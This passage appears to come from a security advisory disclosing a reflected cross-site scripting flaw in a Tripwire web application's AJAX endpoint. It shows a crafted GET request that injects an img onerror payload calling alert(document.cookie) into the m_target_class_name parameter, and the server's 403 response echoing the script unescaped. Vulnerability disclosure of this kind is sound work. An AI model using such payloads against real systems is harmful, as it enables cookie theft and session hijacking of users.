1. example for the m_target_class_name parameter:

GET 
/ajaxRequest/methodCall.do?m_arguments=&m_use_xjson_response_header=true& 
m_convert_result_to_json=true&m_wrap_json_result=result&m_target_class_na 
me=com.tripwire.space.ui.web.app.servlet.ajax.AjaxStateMonitor29e0f%3Cimg%20src%3 
da%20onerror%3dalert(document.cookie)%3E628fc67ac743f5bbe&m_target_method_nam 
e=getUserRefreshRate&flatten=true&m_IECachePrevention=1372154383033 
HTTP/1.1

The server will reply with:

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
X-JSON: {"AjaxException":{"message":"Unknown class or target method: 
'com.tripwire.space.ui.web.app.util.preferences.AjaxUserPreferences.setInteger24f68<img 
src=a onerror=alert(1)>9c8d48f1addae1a86683fe<img src=a 
onerror=alert(1)>a66367e223d(...)'","url":"","reloadPage":false}}
Content-Type: text/html;charset=UTF-8
Content-Length: 270
Date: Wed, 26 Jun 2013 14:58:48 GMT
Connection: close

{"AjaxException":{"message":"Unknown class or target method: 
'com.tripwire.space.ui.web.app.util.preferences.AjaxUserPreferences.setInteger24f68<img 
src=a onerror=alert(1)>9c8d48f1addae1a86683fe<img src=a 
onerror=alert(1)>a66367e223d(...)'","url":"","reloadPage":false}}
